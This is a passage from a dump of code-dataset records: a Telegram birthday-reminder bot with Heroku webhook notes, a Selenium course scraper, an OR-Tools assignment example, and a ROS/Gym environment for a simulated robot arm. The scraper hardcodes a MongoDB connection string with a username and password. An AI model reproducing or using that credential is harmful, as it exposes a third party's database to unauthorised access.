id-шниками\n if len(data_contact) != 0: # Если данные не пустые\n for row in data_contact:\n bot.send_message(row[2], 'День рождение у: ' + str(row[0]) + ' ' + str(row[1]) )\n db.close()\n time.sleep(60) # Через минуту запускаем заного\n\n\n# Запускаем новый поток, который каждый день смотрит кому нужно отправить уведомления из БД контактов\nstart_contact_notification()\n\n\n\n#!------------------------------------------------------------------------------------------!#\n# СЕРВЕРНАЯ ЧАСТЬ (НЕ ТРОГАТЬ)\n#!------------------------------------------------------------------------------------------!#\n\"\"\"\n@app.route('/' + token, methods=['POST'])\ndef get_message():\n bot.process_new_updates([telebot.types.Update.de_json(request.stream.read().decode(\"utf-8\"))])\n return \"POST\", 200\n\n\n@app.route(\"/\")\ndef web_hook():\n bot.remove_webhook()\n bot.set_webhook(url='https://miass-bot.herokuapp.com/' + token)\n return \"CONNECTED\", 200\n\"\"\"\n#app.run(host=\"0.0.0.0\", port=os.environ.get('PORT', 5000)) - это нам не нужно, потому что мы выполняем команду: gunicorn runp-heroku:app\n\n# Если web-хуки не работают или хочешь запустить на локальной машине\n# Необходимо закомментировтаь серверную часть и включить bot.polling\n\n#Включить, если не работают веб хуки\n\n#Если появляется ошибка \"Conflict: can\\'t use getUpdates method while webhook is active\", меняем токен бота\n# Пишем @botFather\n# /revoke\n#\n# /MiassSuperBot\n\n# или\n# heroku ps:scale web=0 #! Отключаем сервер\n# Телеграма отработает хуки\n# heroku ps:scale web=1 #! Включаем сервер\n\n\n#или выполняем bot.remove_webhook()\nbot.remove_webhook()\nbot.polling(none_stop=True)\n\n\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"411419186","text":"from selenium.webdriver import Chrome\nfrom selenium.common.exceptions import NoSuchElementException\nfrom pymongo import MongoClient\n\ndef Scrape_Futurelearn():\n\t#Set up MongoDB client\n\tdb_client = MongoClient('mongodb+srv://jonesca7:tohacks2020@coursehub-8qtyk.gcp.mongodb.net/test?retryWrites=true&w=majority')\n\tdb = db_client.CourseList #Select database \n\tcollection = db.collection #Create collection called Coursera \n\n\twebdriver = \"chromedriver.exe\"\n\tdriver = Chrome(webdriver)\n\n\turl = \"https://www.classcentral.com/report/futurelearn-free-certificates/\"\n\tdriver.get(url)\n\n\tcourse_list = []\n\tcourses = driver.find_elements_by_xpath(\"//section/div/ul/li\")\n\tfor course in courses:\n\t\tcourse_title = course.find_element_by_xpath(\"a\").text\n\n\t\ttry:\n\t\t\tcourse_platform = course.find_element_by_xpath(\"em\").text\n\t\texcept NoSuchElementException:\n\t\t\tcourse_platform = \"Unknown\"\n\n\t\tcourse_url = course.find_element_by_xpath(\"a\").get_attribute(\"href\")\n\t\n\t\tcourse_object = {\"name\" : course_title, \"topic\" : \"N/A\", \"platform\" : course_platform, \"url\" : course_url}\n\t\tcourse_list.append(course_object)\n\n\tcollection.insert_many(course_list)\n\n\tdriver.close()","sub_path":"futurelearn.py","file_name":"futurelearn.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"142800400","text":"# https://developers.google.com/optimization/assignment/assignment_groups\nfrom ortools.sat.python import cp_model\n\n\ndef main():\n # Model\n model = cp_model.CpModel()\n\n # Create data\n # each work is in a row and each task is in a column\n costs = [[90, 76, 75, 70, 50, 74],\n [35, 85, 55, 65, 48, 101],\n [125, 95, 90, 105, 59, 120],\n [45, 110, 95, 115, 104, 83],\n [60, 105, 80, 75, 59, 62],\n [45, 65, 110, 95, 47, 31],\n [38, 51, 107, 41, 69, 99],\n [47, 85, 57, 71, 92, 77],\n [39, 63, 97, 49, 118, 56],\n [47, 101, 71, 60, 88, 109],\n [17, 39, 103, 64, 61, 92],\n [101, 45, 83, 59, 92, 27]]\n num_workers = len(costs)\n num_tasks = len(costs[0])\n\n group1 = [[0, 0, 1, 1], # Workers 2, 3\n [0, 1, 0, 1], # Workers 1, 3\n [0, 1, 1, 0], # Workers 1, 2\n [1, 1, 0, 0], # Workers 0, 1\n [1, 0, 1, 0]] # Workers 0, 2\n\n group2 = [[0, 0, 1, 1], # Workers 6, 7\n [0, 1, 0, 1], # Workers 5, 7\n [0, 1, 1, 0], # Workers 5, 6\n [1, 1, 0, 0], # Workers 4, 5\n [1, 0, 0, 1]] # Workers 4, 7\n\n group3 = [[0, 0, 1, 1], # Workers 10, 11\n [0, 1, 0, 1], # Workers 9, 11\n [0, 1, 1, 0], # Workers 9, 10\n [1, 0, 1, 0], # Workers 8, 10\n [1, 0, 0, 1]] # Workers 8, 11\n\n # Create the variables\n x = {}\n for i in range(num_workers):\n for j in range(num_tasks):\n x[i, j] = model.NewBoolVar(f'x[{i},{j}]')\n\n # Create a linear constraint\n # Each worker is assigned to at most one task.\n [model.Add(sum(x[i, j] for j in range(num_tasks)) <= 1) for i in range(num_workers)]\n\n # Each task is assigned to at least one worker.\n [model.Add(sum(x[i, j] for i in range(num_workers)) == 1) for j in range(num_tasks)]\n\n # Create variables for each worker, indicating whether they work on some task.\n workers = []\n for i in range(num_workers):\n workers.append(model.NewBoolVar(f'worker{i}'))\n\n for i in range(num_workers):\n model.Add(workers[i] == sum(x[i, j] for j in range(num_tasks)))\n\n # Define the allowed groups of worders\n model.AddAllowedAssignments([workers[0], workers[1], workers[2], workers[3]], group1)\n model.AddAllowedAssignments([workers[4], workers[5], workers[6], workers[7]], group2)\n model.AddAllowedAssignments([workers[8], workers[9], workers[10], workers[11]], group3)\n\n # Create the objective function\n objective_terms = []\n for i in range(num_workers):\n for j in range(num_tasks):\n objective_terms.append(costs[i][j] * x[i, j])\n model.Minimize(sum(objective_terms))\n\n solver = cp_model.CpSolver()\n status = solver.Solve(model)\n\n if status == cp_model.OPTIMAL:\n print(f'Total cost = {solver.ObjectiveValue()}')\n for i in range(num_workers):\n for j in range(num_tasks):\n if solver.BooleanValue(x[i, j]):\n print(f' Worker {i} assigned to task {j}. Cost = {costs[i][j]}')\n else:\n print('No solution found.')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"SAT/sat_assignment_allowed_group.py","file_name":"sat_assignment_allowed_group.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"69341561","text":"#!/usr/bin/env python\n\n# IMPORT\nimport gym\nimport rospy\nimport numpy as np\nimport sys\nimport os\nimport yaml\nimport math\nimport time\nimport random\nimport datetime\nimport rospkg\nfrom gym import spaces\nfrom gym.utils import seeding\nfrom gym.envs.registration import register\nfrom transformations import quaternion_from_euler, euler_from_quaternion, quaternion_multiply, quaternion_conjugate\n\n# OTHER FILES\nimport environments.util_env as U\nimport environments.util_math as UMath\nfrom environments.gazebo_connection import GazeboConnection\nfrom environments.controllers_connection import ControllersConnection\nfrom environments.joint_publisher import JointPub\nfrom baselines import logger\n\n\n# MESSAGES/SERVICES\nfrom std_msgs.msg import Float64\nfrom std_msgs.msg import Bool\nfrom sensor_msgs.msg import JointState\nfrom gazebo_msgs.msg import ContactsState\nfrom sensor_msgs.msg import Image\nfrom gazebo_msgs.srv import GetModelState\nfrom gazebo_msgs.srv import SetModelState\nfrom gazebo_msgs.srv import GetLinkState\nfrom gazebo_msgs.srv import DeleteModel\nfrom gazebo_msgs.srv import SpawnModel\nfrom geometry_msgs.msg import Point, Quaternion, Vector3, Pose\nfrom gazebo_msgs.msg import ModelState\nfrom geometry_msgs.msg import Pose\nfrom geometry_msgs.msg import Point\nfrom openai_ros.msg import RLExperimentInfo\n\nfrom simulation.msg import VacuumGripperState\nfrom simulation.srv import VacuumGripperControl\n\n\n# DEFINE ENVIRONMENT CLASS\nclass PickbotEnv(gym.Env):\n\n def __init__(self, joint_increment_value=0.02, sim_time_factor=0.001, running_step=0.001, random_object=False,\n random_position=False, use_object_type=False, env_object_type='free_shapes', load_init_pos=False):\n \"\"\"\n initializing all the relevant variables and connections\n :param joint_increment_value: increment of the joints\n :param running_step: gazebo simulation time factor\n :param random_object: spawn random object in the simulation\n :param random_position: change object position in each reset\n :param use_object_type: assign IDs to objects and used them in the observation space\n :param env_object_type: object type for environment, free_shapes for boxes while others are related to use_case\n 'door_handle', 'combox', ...\n \"\"\"\n\n # Assign Parameters\n self._joint_increment_value = joint_increment_value\n self.running_step = running_step\n self._random_object = random_object\n self._random_position = random_position\n self._use_object_type = use_object_type\n self._load_init_pos = load_init_pos\n\n # Assign MsgTypes\n self.joints_state = JointState()\n self.contact_1_state = ContactsState()\n self.contact_2_state = ContactsState()\n self.collision = Bool()\n self.camera_rgb_state = Image()\n self.camera_depth_state = Image()\n self.contact_1_force = Vector3()\n self.contact_2_force = Vector3()\n self.gripper_state = VacuumGripperState()\n\n self._list_of_observations = [\"elbow_joint_state\",\n \"shoulder_lift_joint_state\",\n \"shoulder_pan_joint_state\",\n \"wrist_1_joint_state\",\n \"wrist_2_joint_state\",\n \"wrist_3_joint_state\",\n \"vacuum_gripper_pos_x\",\n \"vacuum_gripper_pos_y\",\n \"vacuum_gripper_pos_z\",\n \"vacuum_gripper_ori_w\",\n \"vacuum_gripper_ori_x\",\n \"vacuum_gripper_ori_y\",\n \"vacuum_gripper_ori_z\",\n \"object_pos_x\",\n \"object_pos_y\",\n \"object_pos_z\",\n \"object_ori_w\",\n \"object_ori_x\",\n \"object_ori_y\",\n \"object_ori_z\",\n ]\n\n # if self._use_object_type:\n # self._list_of_observations.append(\"object_type\")\n\n # Establishes connection with simulator\n \"\"\"\n 1) Gazebo Connection \n 2) Controller Connection\n 3) Joint Publisher \n \"\"\"\n self.gazebo = GazeboConnection(sim_time_factor=sim_time_factor)\n self.controllers_object = ControllersConnection()\n self.pickbot_joint_publisher_object = JointPub()\n\n # Define Subscribers as Sensordata\n \"\"\"\n 1) /pickbot/joint_states\n 2) /gripper_contactsensor_1_state\n 3) /gripper_contactsensor_2_state\n 4) /gz_collisions\n 5) /pickbot/gripper/state\n 6) /camera_rgb/image_raw \n 7) /camera_depth/depth/image_raw\n \"\"\"\n rospy.Subscriber(\"/pickbot/joint_states\", JointState, self.joints_state_callback)\n rospy.Subscriber(\"/gripper_contactsensor_1_state\", ContactsState, self.contact_1_callback)\n rospy.Subscriber(\"/gripper_contactsensor_2_state\", ContactsState, self.contact_2_callback)\n rospy.Subscriber(\"/gz_collisions\", Bool, self.collision_callback)\n rospy.Subscriber(\"/pickbot/gripper/state\", VacuumGripperState, self.gripper_state_callback)\n # rospy.Subscriber(\"/camera_rgb/image_raw\", Image, self.camera_rgb_callback)\n # rospy.Subscriber(\"/camera_depth/depth/image_raw\", Image, self.camera_depth_callback)\n\n # Define Action and state Space and Reward Range\n \"\"\"\n Action Space: Box Space with 6 values.\n \n State Space: Box Space with 20 values. It is a numpy array with shape (20,)\n\n Reward Range: -infinity to infinity \n \"\"\"\n\n # Directly use joint_positions as action\n if self._joint_increment_value is None:\n high_action = (math.pi - 0.05) * np.ones(6)\n low_action = -high_action\n else: # Use joint_increments as action\n high_action = self._joint_increment_value * np.ones(6)\n low_action = -high_action\n\n self.action_space = spaces.Box(low_action, high_action)\n\n self.obs_dim = 20\n high = np.inf * np.ones(self.obs_dim)\n low = -high\n\n self.observation_space = spaces.Box(low, high)\n\n # if self._use_object_type:\n # high = np.append(high, 9)\n # low = np.append(low, 0)\n\n self.reward_range = (-np.inf, np.inf)\n\n self._seed()\n self.done_reward = 0\n\n # set up everything to publish the Episode Number and Episode Reward on a rostopic\n self.episode_num = 0\n self.accumulated_episode_reward = 0\n self.episode_steps = 0\n self.reward_pub = rospy.Publisher('/openai/reward', RLExperimentInfo, queue_size=1)\n self.reward_list = []\n self.episode_list = []\n self.step_list = []\n self.csv_name = logger.get_dir() + '/result_log'\n print(\"CSV NAME\")\n print(self.csv_name)\n self.csv_success_exp = logger.get_dir() + '/success_exp' + datetime.datetime.now().strftime('%Y-%m-%d_%Hh%Mmin') + '.csv'\n self.successful_attempts = 0\n\n # variable to store last observation\n self.old_obs = self.get_obs()\n\n # object name: name of the target object\n # object type: index of the object name in the object list\n # object list: pool of the available objects, have at least one entry\n self.object_name = ''\n self.object_type_str = ''\n self.object_type = 0\n self.object_list = U.get_target_object(env_object_type)\n print(\"object list {}\".format(self.object_list))\n self.object_initial_position = Pose(position=Point(x=-0.13, y=0.848, z=1.06),\n orientation=quaternion_from_euler(0.002567, 0.102, 1.563))\n\n # select first object, set object name and object type\n # if object is random, spawn random object\n # else get the first entry of object_list\n self.set_target_object([0, 0, 0, 0, 0, 0])\n\n # get maximum distance to the object to calculate reward, renewed in the reset function\n self.max_distance, _ = U.get_distance_gripper_to_object()\n # The closest distance during training\n self.min_distance = 999\n\n # get samples from reaching task\n if self._load_init_pos:\n import environments\n self.init_samples = U.load_samples_from_prev_task(os.path.dirname(environments.__file__) +\n \"/contacts_sample/door_sample/success_exp2019-05-21_11h41min.csv\")\n\n # Callback Functions for Subscribers to make topic values available each time the class is initialized\n def joints_state_callback(self, msg):\n self.joints_state = msg\n\n def contact_1_callback(self, msg):\n self.contact_1_state = msg.states\n\n def contact_2_callback(self, msg):\n self.contact_2_state = msg.states\n\n def collision_callback(self, msg):\n self.collision = msg.data\n\n def camera_rgb_callback(self, msg):\n self.camera_rgb_state = msg\n\n def camera_depth_callback(self, msg):\n self.camera_depth_state = msg\n\n def gripper_state_callback(self, msg):\n self.gripper_state = msg\n\n def _seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def reset(self):\n \"\"\"\n Reset The Robot to its initial Position and restart the Controllers\n\n 1) Change Gravity to 0 -> That arm doesnt fall\n 2) Turn Controllers off\n 3) Pause Simulation\n 4) Delete previous target object if randomly chosen object is set to True\n 4) Reset Simulation\n 5) Set Model Pose to desired one\n 6) Unpause Simulation\n 7) Turn on Controllers\n 8) Restore Gravity\n 9) Get Observations and return current State\n 10) Check all Systems work\n 11) Spawn new target\n 12) Pause Simulation\n 13) Write initial Position into Yaml File\n 14) Create YAML Files for contact forces in order to get the average over 2 contacts\n 15) Create YAML Files for collision to make sure to see a collision due to high noise in topic\n 16) Unpause Simulation cause in next Step System must be running otherwise no data is seen by Subscribers\n 17) Publish Episode Reward and set accumulated reward back to 0 and iterate the Episode Number\n 18) Return State\n \"\"\"\n\n # print(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Reset %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n self.gazebo.change_gravity(0, 0, 0)\n self.controllers_object.turn_off_controllers()\n # turn off the gripper\n # U.turn_off_gripper()\n self.gazebo.resetSim()\n self.gazebo.pauseSim()\n self.gazebo.resetSim()\n time.sleep(0.1)\n\n # turn on the gripper\n # U.turn_on_gripper()\n\n if self._load_init_pos:\n # load sample from previous training result\n sample_ep = random.choice(self.init_samples)\n print(\"Joints from samples: {}\".format(sample_ep[0:6]))\n # self.pickbot_joint_publisher_object.set_joints(sample_ep[0:6])\n self.set_target_object(sample_ep[-6:])\n else:\n self.pickbot_joint_publisher_object.set_joints()\n vg_geo = U.get_link_state(\"vacuum_gripper_link\")\n to_geo = U.get_link_state(\"target\")\n orientation_error = quaternion_multiply(vg_geo[3:], quaternion_conjugate(to_geo[3:]))\n # print(\"Orientation error {}\".format(orientation_error))\n box_pos = U.get_random_door_handle_pos() if self._random_position else self.object_initial_position\n U.change_object_position(self.object_name, box_pos)\n # Code above is hard-coded for door handle, modify later.\n # TO-DO: Modify reset wrt the object type as in the reach env\n\n self.gazebo.unpauseSim()\n self.controllers_object.turn_on_controllers()\n self.gazebo.change_gravity(0, 0, -9.81)\n self._check_all_systems_ready()\n\n # last_position = [1.5, -1.2, 1.4, -1.87, -1.57, 0]\n # last_position = [0, 0, 0, 0, 0, 0]\n # with open('last_position.yml', 'w') as yaml_file:\n # yaml.dump(last_position, yaml_file, default_flow_style=False)\n # with open('contact_1_force.yml', 'w') as yaml_file:\n # yaml.dump(0.0, yaml_file, default_flow_style=False)\n # with open('contact_2_force.yml', 'w') as yaml_file:\n # yaml.dump(0.0, yaml_file, default_flow_style=False)\n with open('collision.yml', 'w') as yaml_file:\n yaml.dump(False, yaml_file, default_flow_style=False)\n observation = self.get_obs()\n # print(\"current joints {}\".format(observation[:6]))\n # get maximum distance to the object to calculate reward\n # self.max_distance, _ = U.get_distance_gripper_to_object()\n # self.min_distance = self.max_distance\n self.gazebo.pauseSim()\n state = U.get_state(observation)\n self._update_episode()\n self.gazebo.unpauseSim()\n return state\n\n def step(self, action):\n \"\"\"\n Given the action selected by the learning algorithm,\n we perform the corresponding movement of the robot\n return: the state of the robot, the corresponding reward for the step and if its done(terminal State)\n\n 1) read last published joint from YAML\n 2) define ne joints acording to chosen action\n 3) Write joint position into YAML to save last published joints for next step\n 4) Unpause, Move to that pos for defined time, Pause\n 5) Get Observations and pause Simulation\n 6) Convert Observations into State\n 7) Unpause Simulation check if its done, calculate done_reward and pause Simulation again\n 8) Calculate reward based on Observatin and done_reward\n 9) Unpause that topics can be received in next step\n 10) Return State, Reward, Done\n \"\"\"\n\n self.old_obs = self.get_obs()\n\n print(\"====================================================================\")\n # print(\"action: {}\".format(action))\n\n # 1) read last_position out of YAML File\n last_position = self.old_obs[:6]\n # with open(\"last_position.yml\", 'r') as stream:\n # try:\n # last_position = (yaml.load(stream, Loader=yaml.Loader))\n # except yaml.YAMLError as exc:\n # print(exc)\n # 2) get the new joint positions according to chosen action\n if self._joint_increment_value is None:\n next_action_position = action\n else:\n next_action_position = self.get_action_to_position(np.clip(action, -self._joint_increment_value, self._joint_increment_value),\n last_position)\n print(\"next action position: {}\".format(np.around(next_action_position, decimals=3)))\n\n # 3) write last_position into YAML File\n # with open('last_position.yml', 'w') as yaml_file:\n # yaml.dump(next_action_position, yaml_file, default_flow_style=False)\n\n # 4) unpause, move to position for certain time\n self.gazebo.unpauseSim()\n self.pickbot_joint_publisher_object.move_joints(next_action_position)\n # time.sleep(self.running_step)\n\n # Busy waiting until all the joints reach the next_action_position (first the third joints are reversed)\n start_ros_time = rospy.Time.now()\n while True:\n # Check collision:\n invalid_collision = self.get_collisions()\n if invalid_collision:\n print(\">>>>>>>>>> Collision: RESET <<<<<<<<<<<<<<<\")\n observation = self.get_obs()\n print(\"joints after reset collision : {} \".format(observation[:6]))\n\n # calculate reward immediately\n distance_error = observation[6:9] - observation[13:16]\n orientation_error = quaternion_multiply(observation[9:13], quaternion_conjugate(observation[16:]))\n\n rewardDist = UMath.rmseFunc(distance_error)\n rewardOrientation = 2 * np.arccos(abs(orientation_error[0]))\n\n reward = UMath.computeReward(rewardDist, rewardOrientation, invalid_collision)\n print(\"Reward this step after colliding {}\".format(reward))\n self.accumulated_episode_reward += reward\n return U.get_state(observation), reward, True, {}\n\n elapsed_time = rospy.Time.now() - start_ros_time\n if np.isclose(next_action_position, self.joints_state.position, rtol=0.0, atol=0.01).all():\n break\n elif elapsed_time > rospy.Duration(2): # time out\n print(\"TIME OUT, joints haven't reach positions\")\n break\n\n # 5) Get Observations and pause Simulation\n observation = self.get_obs()\n print(\"Observation in the step: {}\".format(np.around(observation[:6], decimals=3)))\n print(\"Joints in the step: {}\".format(np.around(self.joints_state.position, decimals=3)))\n # if observation[0] < self.min_distance:\n # self.min_distance = observation[0]\n self.gazebo.pauseSim()\n\n # 6) Convert Observations into state\n state = U.get_state(observation)\n\n # U.get_obj_orient()\n\n # 7) Unpause Simulation check if its done, calculate done_reward\n self.gazebo.unpauseSim()\n done, done_reward, invalid_collision = self.is_done(observation, last_position)\n self.gazebo.pauseSim()\n\n # 8) Calculate reward based on Observation and done_reward and update the accumulated Episode Reward\n # reward = self.compute_reward(observation, done_reward, invalid_contact)\n # reward = UMath.compute_reward_orient(observation, done_reward, invalid_contact)\n\n distance_error = observation[6:9] - observation[13:16]\n orientation_error = quaternion_multiply(observation[9:13], quaternion_conjugate(observation[16:]))\n\n rewardDist = UMath.rmseFunc(distance_error)\n rewardOrientation = 2 * np.arccos(abs(orientation_error[0]))\n\n reward = UMath.computeReward(rewardDist, rewardOrientation, invalid_collision) + done_reward\n print(\"Reward this step {}\".format(reward))\n\n self.accumulated_episode_reward += reward\n\n # 9) Unpause that topics can be received in next step\n self.gazebo.unpauseSim()\n\n self.episode_steps += 1\n # 10) Return State, Reward, Done\n return state, reward, done, {}\n\n def _check_all_systems_ready(self):\n \"\"\"\n Checks that all subscribers for sensortopics are working\n\n 1) /pickbot/joint_states\n 2) /gripper_contactsensor_1_state\n 3) /gripper_contactsensor_2_state\n 7) Collisions\n\n not used so far\n 4) /camera_rgb/image_raw\n 5) /camera_depth/depth/image_raw\n\n \"\"\"\n self.check_joint_states()\n self.check_contact_1()\n self.check_contact_2()\n self.check_collision()\n # self.check_rgb_camera()\n # self.check_rgbd_camera()\n # self.check_gripper_state()\n rospy.logdebug(\"ALL SYSTEMS READY\")\n\n def check_joint_states(self):\n joint_states_msg = None\n while joint_states_msg is None and not rospy.is_shutdown():\n try:\n joint_states_msg = rospy.wait_for_message(\"/pickbot/joint_states\", JointState, timeout=0.1)\n self.joints_state = joint_states_msg\n rospy.logdebug(\"Current joint_states READY\")\n except Exception as e:\n rospy.logdebug(\"Current joint_states not ready yet, retrying==>\" + str(e))\n print(\"EXCEPTION: Joint States not ready yet, retrying.\")\n\n def check_contact_1(self):\n contact_1_states_msg = None\n while contact_1_states_msg is None and not rospy.is_shutdown():\n try:\n contact_1_states_msg = rospy.wait_for_message(\"/gripper_contactsensor_1_state\", ContactsState,\n timeout=0.1)\n self.contact_1_state = contact_1_states_msg.states\n rospy.logdebug(\"Contactsensor 1 READY\")\n except Exception as e:\n rospy.logdebug(\"Contactsensor 1 not ready yet, retrying==>\" + str(e))\n print(\"EXCEPTION: Contactsensor 1 not ready yet, retrying.\")\n\n def check_contact_2(self):\n contact_2_states_msg = None\n while contact_2_states_msg is None and not rospy.is_shutdown():\n try:\n contact_2_states_msg = rospy.wait_for_message(\"/gripper_contactsensor_2_state\", ContactsState,\n timeout=0.1)\n self.contact_2_state = contact_2_states_msg.states\n rospy.logdebug(\"Contactsensor 2 READY\")\n except Exception as e:\n rospy.logdebug(\"Contactsensor 2 not ready yet, retrying==>\" + str(e))\n print(\"EXCEPTION: Contactsensor 2 not ready yet, retrying.\")\n\n def check_collision(self):\n collision_msg = None\n while collision_msg is None and not rospy.is_shutdown():\n try:\n collision_msg = rospy.wait_for_message(\"/gz_collisions\", Bool, timeout=0.1)\n self.collision = collision_msg.data\n rospy.logdebug(\"collision READY\")\n except Exception as e:\n rospy.logdebug(\"EXCEPTION: Collision not ready yet, retrying==>\" + str(e))\n\n def check_rgb_camera(self):\n camera_rgb_states_msg = None\n while camera_rgb_states_msg is None and not rospy.is_shutdown():\n try:\n camera_rgb_states_msg = rospy.wait_for_message(\"/camera_rgb/image_raw\", Image, timeout=0.1)\n self.camera_rgb_state = camera_rgb_states_msg\n rospy.logdebug(\"rgb_image READY\")\n except Exception as e:\n rospy.logdebug(\"EXCEPTION: rgb_image not ready yet, retrying==>\" + str(e))\n\n def check_rgbd_camera(self):\n camera_depth_states_msg = None\n while camera_depth_states_msg is None and not rospy.is_shutdown():\n try:\n camera_depth_states_msg = rospy.wait_for_message(\"/camera_depth/depth/image_raw\", Image, timeout=0.1)\n self.camera_depth_state = camera_depth_states_msg\n rospy.logdebug(\"rgbd_image READY\")\n except Exception as e:\n rospy.logdebug(\"EXCEPTION: rgbd_image not ready yet, retrying==>\" + str(e))\n\n def check_gripper_state(self):\n gripper_state_msg = None\n while gripper_state_msg is None and not rospy.is_shutdown():\n try:\n gripper_state_msg = rospy.wait_for_message(\"/pickbot/gripper/state\", VacuumGripperState, timeout=0.1)\n self.gripper_state = gripper_state_msg\n rospy.logdebug(\"gripper_state READY\")\n except Exception as e:\n rospy.logdebug(\"EXCEPTION: gripper_state not ready yet, retrying==>\" + str(e))\n\n # Set target object\n # randomize: spawn object randomly from the object pool. If false, object will be the first entry of the object list\n # random_position: spawn object with random position\n def set_target_object(self, position):\n self.object_name = self.object_list[0][\"name\"]\n self.object_type_str = self.object_list[0][\"type\"]\n self.object_type = 0\n\n box_pos = Pose(position=Point(x=position[0], y=position[1], z=position[2]),\n orientation=quaternion_from_euler(position[3], position[4], position[5]))\n\n U.change_object_position(self.object_name, box_pos)\n print(\"Current target: \", self.object_name)\n\n def get_action_to_position(self, action, last_position):\n \"\"\"\n Take the last published joint and increment/decrement one joint according to action chosen\n :param action: Integer that goes from 0 to 11, because we have 12 actions.\n :param last_position: array of 6 value\n :return: list with all joint positions according to chosen action\n \"\"\"\n\n action_position = np.asarray(last_position) + action\n # clip action that is going to be published to make sure to avoid losing control of controllers\n x = np.clip(action_position, -2.9, 2.9)\n\n return x.tolist()\n\n def get_obs(self):\n \"\"\"\n Returns the state of the robot needed for Algorithm to learn\n The state will be defined by a List (later converted to numpy array) of the:\n\n self._list_of_observations = [\"elbow_joint_state\",\n \"shoulder_lift_joint_state\",\n \"shoulder_pan_joint_state\",\n \"wrist_1_joint_state\",\n \"wrist_2_joint_state\",\n \"wrist_3_joint_state\",\n \"vacuum_gripper_pos_x\",\n \"vacuum_gripper_pos_y\",\n \"vacuum_gripper_pos_z\",\n \"vacuum_gripper_ori_w\",\n \"vacuum_gripper_ori_x\",\n \"vacuum_gripper_ori_y\",\n \"vacuum_gripper_ori_z\",\n \"object_pos_x\",\n \"object_pos_y\",\n \"object_pos_z\",\n \"object_ori_w\",\n \"object_ori_x\",\n \"object_ori_y\",\n \"object_ori_z\",\n ]\n\n :return: observation\n \"\"\"\n\n # Get Joints Data out of Subscriber\n joints_state = self.joints_state.position\n\n for joint in self.joints_state.position:\n if joint > math.pi or joint < -math.pi:\n print(self.joints_state.name)\n print(self.joints_state.position)\n sys.exit(\"Joint exceeds limit\")\n\n vacuum_gripper_geometry = U.get_link_state(\"vacuum_gripper_link\")\n\n target_geometry = U.get_link_state(\"target\")\n\n # Concatenate the information that defines the robot state\n state = np.r_[np.reshape(joints_state, -1),\n np.reshape(vacuum_gripper_geometry, -1),\n np.reshape(target_geometry, -1)]\n\n return state\n\n def get_contact_force_1(self):\n \"\"\"\n Get Contact Force of contact sensor 1\n Takes average over 2 contacts so the chances are higher that both sensors say there is contact the same time due to sensor noise\n :returns force value\n \"\"\"\n\n # get Force out of contact_1_state\n if not self.contact_1_state:\n contact1_force = 0.0\n else:\n for state in self.contact_1_state:\n self.contact_1_force = state.total_wrench.force\n contact1_force_np = np.array((self.contact_1_force.x, self.contact_1_force.y, self.contact_1_force.z))\n force_magnitude_1 = np.linalg.norm(contact1_force_np)\n contact1_force = force_magnitude_1\n\n # read last contact force 1 value out of yaml\n with open(\"contact_1_force.yml\", 'r') as stream:\n try:\n last_contact_1_force = (yaml.load(stream, Loader=yaml.Loader))\n except yaml.YAMLError as exc:\n print(exc)\n # write new contact_1_force value in yaml\n with open('contact_1_force.yml', 'w') as yaml_file:\n yaml.dump(contact1_force, yaml_file, default_flow_style=False)\n # calculate average force\n average_contact_1_force = (last_contact_1_force + contact1_force) / 2\n\n return average_contact_1_force\n\n def get_contact_force_2(self):\n \"\"\"\n Get Contact Force of contact sensor 2\n Takes average over 2 contacts so the chances are higher that both sensors say there is contact the same time due to sensor noise\n :returns force value\n \"\"\"\n\n # get Force out of contact_2_state\n if not self.contact_2_state:\n contact2_force = 0.0\n else:\n for state in self.contact_2_state:\n self.contact_2_force = state.total_wrench.force\n contact2_force_np = np.array((self.contact_2_force.x, self.contact_2_force.y, self.contact_2_force.z))\n force_magnitude_2 = np.linalg.norm(contact2_force_np)\n contact2_force = force_magnitude_2\n\n # read last contact_2_force value out of yaml\n with open(\"contact_2_force.yml\", 'r') as stream:\n try:\n last_contact_2_force = (yaml.load(stream, Loader=yaml.Loader))\n except yaml.YAMLError as exc:\n print(exc)\n # write new contact force 2 value in yaml\n with open('contact_2_force.yml', 'w') as yaml_file:\n yaml.dump(contact2_force, yaml_file, default_flow_style=False)\n # calculate average force\n average_contact_2_force = (last_contact_2_force + contact2_force) / 2\n\n return average_contact_2_force\n\n def get_collisions(self):\n \"\"\"\n Checks all the collisions by listening to rostopic /gz_collisions wich is republishing the gazebo topic (gz topic -e /gazebo/default/physics/contacts).\n The Publisher is started in a different node out of the simulation launch file.\n Stores last value yaml file and if one of the two values is showing a invalid collision it returns a invalid collision.\n This is to make shure seeing collisions due to high sensor noise and publish rate.\n\n If one of the 2 Messages is True it returns True.\n returns:\n False: if no contacts or just valid ones -> Box/Shelf, Wrist3/Box, VacuumGripper/Box\n True: if any other contact occurs which is invalid\n \"\"\"\n\n # read last contact_2_force value out of yaml\n with open(\"collision.yml\", 'r') as stream:\n try:\n last_collision = (yaml.load(stream, Loader=yaml.Loader))\n except yaml.YAMLError as exc:\n print(exc)\n # write new contact force 2 value in yaml\n with open('collision.yml', 'w') as yaml_file:\n yaml.dump(self.collision, yaml_file, default_flow_style=False)\n\n # Check if last_collision or self.collision is True. IF one s true return True else False\n if self.collision == True or last_collision == True:\n return True\n else:\n return False\n\n def is_done(self, observations, last_position):\n \"\"\"Checks if episode is done based on observations given.\n\n Done when:\n -Successfully reached goal: Contact with both contact sensors and contact is a valid one(Wrist3 or/and Vacuum Gripper with unit_box)\n -Crashing with itself, shelf, base\n -Joints are going into limits set\n \"\"\"\n\n done = False\n done_reward = 0\n reward_reached_goal = 1000\n reward_crashing = -2000\n\n # Check if there are invalid collisions\n invalid_collision = self.get_collisions()\n\n # Successfully reached_goal: orientation of the end-effector and target is less than threshold also\n # distance is less than threshold\n distance_gripper_to_target = np.linalg.norm(observations[6:9] - observations[13:16])\n orientation_error = quaternion_multiply(observations[9:13], 